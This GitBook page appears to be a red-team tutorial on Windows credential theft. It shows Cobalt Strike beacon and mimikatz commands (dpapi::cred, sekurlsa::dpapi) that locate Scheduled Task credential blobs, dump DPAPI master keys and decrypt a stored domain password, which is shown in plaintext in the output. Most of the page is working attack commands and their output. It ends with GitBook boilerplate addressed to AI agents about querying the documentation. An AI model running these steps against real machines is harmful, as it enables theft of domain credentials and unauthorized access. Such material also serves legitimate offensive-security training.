> For the complete documentation index, see [llms.txt](https://yamortsa.gitbook.io/rto/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://yamortsa.gitbook.io/rto/data-protection-api/scheduled-task-credentials.md). # Scheduled Task Credentials Scheduled Tasks can save credentials so that they can run under the context of a user without them having to be logged on. If we have local admin privileges on a machine, we can decrypt them in much the same way. The blobs are saved under `C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\`. ``` beacon> ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials Size Type Last Modified Name ---- ---- ------------- ---- 10kb fil 08/30/2022 12:42:24 DFBE70A7E5CC19A398EBF1B96859CE5D 528b fil 08/16/2022 14:55:28 F3190EBE0498B77B4A85ECBABCA19B6E ``` \\ `dpapi::cred` can tell us the GUID of the master key used to encrypt each one. ``` beacon> mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\F3190EBE0498B77B4A85ECBABCA19B6E guidMasterKey : {aaa23e6b-bba8-441d-923c-ec242d6690c3} ``` \\ `sekurlsa::dpapi` to dump cached keys. ``` beacon> mimikatz !sekurlsa::dpapi [00000000] * GUID : {aaa23e6b-bba8-441d-923c-ec242d6690c3} * Time : 9/6/2022 12:14:38 PM * MasterKey : 10530dda04093232087d35345bfbb4b75db7382ed6db73806f86238f6c3527d830f67210199579f86b0c0f039cd9a55b16b4ac0a3f411edfacc593a541f8d0d9 * sha1(key) : cfbc842e78ee6713fa5dcb3c9c2d6c6d7c09f06c ``` \\ And then decrypt. ``` beacon> mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\F3190EBE0498B77B4A85ECBABCA19B6E /masterkey:10530dda04093232087d35345bfbb4b75db7382ed6db73806f86238f6c3527d830f67210199579f86b0c0f039cd9a55b16b4ac0a3f411edfacc593a541f8d0d9 TargetName : Domain:batch=TaskScheduler:Task:{86042B87-C8D0-40A5-BB58-14A45356E01C} UserName : DEV\jking CredentialBlob : Qwerty123 ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://yamortsa.gitbook.io/rto/data-protection-api/scheduled-task-credentials.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.